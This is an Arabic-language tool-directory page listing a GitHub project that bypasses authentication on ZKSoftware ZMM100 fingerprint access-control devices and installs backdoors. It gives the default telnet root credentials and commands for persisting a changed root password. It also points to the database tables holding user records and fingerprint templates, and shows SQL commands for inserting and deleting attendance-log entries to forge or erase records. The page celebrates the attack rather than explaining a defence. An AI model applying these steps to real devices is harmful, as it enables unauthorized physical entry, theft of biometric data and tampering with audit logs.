Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Backdooring-ZMM100-FingerPrint-Devices — تجاوز المصادقة & زرع الأبواب الخلفية تلقائيًا في الأجهزة | Kitploit
أدوات/GitHubGitHub/9aylas/backdooring-zmm100-fingerprint-devices
المصادقة والترخيصأمان الأنظمة المدمجةهجمات كلمات المرورالاستغلالاختراق الأجهزةأداة الوصول عن بعدأمن قواعد البيانات
GitHub9aylas/backdooring-zmm100-fingerprint-devices

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

Backdooring-ZMM100-FingerPrint-Devices

تجاوز المصادقة & زرع الأبواب الخلفية تلقائيًا في الأجهزة

عرض المستودع
1644منذ 7 سنواتلم تتم المراجعة بعد

اختراق الأجهزة المدمجة :

root@kitploit:~
Hardware platform ZMM100 :
The fingerprint access control device Made by ZKSoftware.
    • اسم المستخدم/كلمة المرور الافتراضية: root:solokey
  • البروتوكول: Telnet (23).

السكريبتات :

  • pwnit.py : أداة آلية لاختراق الأجهزة.
  • hell : باب خلفي ثانٍ.
  • leak-data.sh : باب خلفي ثالث.

فيديو يوتيوب :

image alt text https://www.youtube.com/watch?v=Zd1N0CbvR0k

تغيير كلمة مرور الجذر (root) :

root@kitploit:~
passwd
{ enter new root password }
cp /etc/passwd /mnt/mtdblock
cp /etc/passwd /mnt/mtdblock/data/

المزيد من المعلومات :

root@kitploit:~
This directory "mnt/ramdisk" contains : picture.jpg , finger.bmp.
Web directory  "/mnt/mtdblock/service/webserver" contains : some shitty csl web files lol.
Database here : "/mnt/mtdblock/data/ZKDB.db"
Important tables : "ATT_LOGS" ( user logs ) , "USER_INFO" ( user informations ) , "fptemplate10"  ( finger print data ).
-- https://i.imgur.com/yNfVNSH.png ( ATT_LOGS ).
-- https://i.imgur.com/ujiIqzf.png ( USER_INFO ).
-- https://i.imgur.com/ilGwFZB.png ( fptemplate10 ).

> https://github.com/adrobinoga/zk-protocol/blob/master/sections/data-user.md#example-of-a-template-entry
SQLite ELF File : "/mnt/mtdblock/data/sqlite3_arm" --> ./sqlite3_arm ZKDB.db;

إدراج / حذف البيانات :

  • إدراج : ./sqlite3_arm ZKDB.db "INSERT INTO ATT_LOG VALUES (null,1224,15,'2019-04-12T00:00:00','0','0',null,null,null,null,0);"

  • حذف السجل : ./sqlite3_arm ZKDB.db "DELETE FROM ATT_LOG WHERE ID = 1224;"

هذا رائع يا صاح 3:) !

المراجع :

https://blog.infobytesec.com/2014/07/perverting-embedded-devices-zksoftware_2920.html https://github.com/linsir/pyscripts/tree/master/zkteco_check_in

تنزيل الأداة